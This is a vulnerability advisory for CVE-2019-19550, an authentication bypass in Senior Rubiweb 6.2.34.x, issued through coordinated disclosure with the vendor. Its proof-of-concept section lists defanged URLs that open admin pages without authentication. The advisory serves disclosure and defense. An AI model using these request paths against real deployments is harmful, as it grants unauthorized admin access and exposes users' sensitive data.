CVE-2019-19550
[Description]
Remote Authentication Bypass in Senior Rubiweb 6.2.34.28 and 6.2.34.37 allows admin access to sensitive information of affected users using vulnerable versions. The attacker only needs to provide the correct URL.
[Important Dates]
- Announcement (to Vendor): 2019-12-02
- Public disclosure date: 2020-01-30
[Vulnerability Type]
Incorrect Access Control
[Vendor of Product]
Senior
[Affected Product Code Base]
- Rubiweb - 6.2.34.37
- Rubiweb - 6.2.34.28
- Other versions may be affected, especially in the same family (not tested yet)
[Affected Component]
Rubiweb
[Attack Type]
Remote
[Impact Information Disclosure]
True
[Attack Vectors]
Access to sensitive information is publicly available without special requirements (only the correct URI)
[Has vendor confirmed or acknowledged the vulnerability?]
True
[PoC - Proof of Concept]
- Simply try to connect to authenticated portal to confirm the existence and version of affected product:
- hXXp://subdomain.customer.tld:8080/rubiweb/
- Access the vulnerable page (admin without authentication):
- hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1
- hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=ENTRANCEREL&SIS=FP&NOME=FPIN103.ANU
[Discoverer]
Mauricio Santos (R&D UnderProtection) and Hesron Hori (R&D UnderProtection)
[Thanks to]
Senior - Vendor's Information Security Team who collaborated to a coordinated disclosure